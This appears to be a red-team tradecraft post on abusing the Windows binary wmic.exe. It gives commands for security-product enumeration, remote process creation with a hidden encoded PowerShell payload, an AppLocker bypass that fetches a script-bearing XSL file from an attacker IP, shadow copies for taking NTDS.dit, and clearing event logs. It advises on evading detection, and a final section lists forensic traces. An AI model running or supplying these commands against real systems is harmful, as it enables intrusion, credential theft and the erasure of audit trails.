Microsoft has been killing wmic.exe for a while now — it’s a Feature on Demand in Windows 11 22H2 and gone entirely in 24H2. But on every Windows 10 box and on Server 2016/2019/2022, it’s still there. That covers most of the enterprise environments you’ll see on an engagement.
Wmic is useful for the same reason dsquery and net are: it’s signed, it’s expected on the box, and it dodges a lot of the string-based detections aimed at PowerShell. It does enumeration, remote execution, and lateral movement, all through DCOM/RPC.
1. Discovery beyond the basics#
Basic enumeration is easy. Knowing where to look is the harder part.
Antivirus and firewall status#
service list lies about what’s actually protecting the host. The WMI SecurityCenter2 namespace is what Windows itself uses to track registered security products on client OSes.
wmic /namespace:\\root\SecurityCenter2 path AntiVirusProduct get displayName, productState, pathToSignedProductExeproductState is a bitmask. Convert it to hex to see whether the AV is enabled, disabled, or asleep. Exact bit meanings vary by vendor, but 0x1000 is the “on” bit and 0x0000 means nothing’s watching. Changes in the value are what matter more than absolute interpretation.
Installed patches (QFE)#
Before you fire off a kernel exploit, see if the patch is already in.
:: All Quick Fix Engineering entries with install date
wmic qfe get HotfixId, InstalledOn, DescriptionUser accounts (the SID walk)#
net user is noisy. WMI is quieter.
wmic useraccount get name, sid, disabledSort by SID to find the oldest accounts. The built-in Administrator ends in -500, and anything below -1000 is built-in.
Startup persistence#
Useful for spotting someone else’s persistence — or verifying your own.
wmic startup get caption, command, location, user2. Lateral movement via remote execution#
Wmic talks to remote nodes over DCOM/RPC. No RDP required, just port 135 plus the dynamic RPC range.
process call create#
The /node switch lets you spawn a process on a remote box.
:: /node:<TargetIP> /user:<Domain\User> /password:<Pass> process call create "<Command>"
wmic /node:"10.10.1.5" /user:"CORP\Admin" /password:"Pass123" process call create "cmd.exe /c start powershell.exe -nop -w hidden -enc [PAYLOAD]"One catch: remote process call create doesn’t return stdout to your terminal. You’ll get ReturnValue = 0; and a ProcessId, and that’s it. To get output, redirect on the target side and pull it back over SMB:
wmic /node:"10.10.1.5" ... process call create "cmd.exe /c whoami > C:\temp\out.txt"
type \\10.10.1.5\c$\temp\out.txt3. Do not run wmic product list#
You’ll see this command in old blog posts. Don’t run it.
Querying Win32_Product triggers a Windows Installer consistency check against every installed application. It takes minutes, and every check writes Event ID 1035 to the Application log (“Windows Installer reconfigured the product…”). One command, hundreds of log entries, all pointing at you.
For software inventory, hit the registry (HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall) instead. For security tools, use the SecurityCenter2 query above.
4. XSL bypass (Squiblydoo)#
Wmic accepts a /format: argument that points at an XSL stylesheet. That stylesheet can be local or remote. And XSL stylesheets can embed JScript or VBScript that gets executed during the transform.
Since wmic.exe is a signed Microsoft binary, this often slips past AppLocker script rules — wmic.exe is usually allowed.
wmic process get name /format:"http://10.10.14.5/payload.xsl"Payload:
<ns0:stylesheet xmlns:ns0="http://www.w3.org/1999/XSL/Transform" xmlns:ns1="urn:schemas-microsoft-com:xslt" version="1.0">
<ns0:output method="text" />
<ns1:script implements-prefix="user" language="JScript">
var r = new ActiveXObject("WScript.Shell").Run("calc.exe");
</ns1:script>
</ns0:stylesheet>Wmic fetches the file, parses it, and the ActiveXObject line runs. Swap calc.exe for whatever you actually want.
This technique is on every modern EDR’s radar now (it’s been public since 2018 as “Squiblydoo”), so don’t expect it to work blind. Test against the target’s defenses first.
5. Shadow copy abuse#
Like vssadmin, Wmic can talk to the Volume Shadow Copy Service. Useful for grabbing locked files like NTDS.dit or the SYSTEM registry hive.
:: Create a shadow copy of C:
wmic shadowcopy call create Volume="C:\"
:: List existing shadow copies (get the ID/path)
wmic shadowcopy list brief
:: Clean up
wmic shadowcopy where ID="{ID-GOES-HERE}" delete6. Log clearing#
Wmic can clear event logs. This generates Event ID 1102 (“The audit log was cleared”), which is one of the loudest signals a Windows host can emit. Don’t do it unless you’re already burning the host.
wmic nteventlog where "logfilename='System'" call cleareventlog
wmic nteventlog where "logfilename='Security'" call cleareventlog7. Forensic footprint#
Wmic is not silent.
- Process creation.
wmic.exeshows up in Security Event ID 4688. If “Command Line Auditing” is on, your full command line (XSL URL and all) lands in the log next to it. - WMI-Activity logs.
Microsoft-Windows-WMI-Activity/Operationalrecords method execution and errors. Lateral movement leaves a particularly obvious trail becauseWmiPrvSE.exeends up spawningcmd.exeorpowershell.exe. - Network traffic. Remote WMI is TCP 135 for the DCOM relay plus a dynamic high port (49152-65535) for the actual session. That pattern looks nothing like SMB (445) and stands out in flow data.
Closing#
Wmic is on borrowed time. The install base buys you years though, especially in environments that haven’t finished their Server 2019 migrations, let alone touched Windows 11 24H2. It’s worth keeping in the toolkit not because it’s quiet (it isn’t), but because the binary is already trusted on the host and the protocol is already there. When you do reach for it, know the footprint and have CIM cmdlets ready for the boxes where wmic.exe finally isn’t.
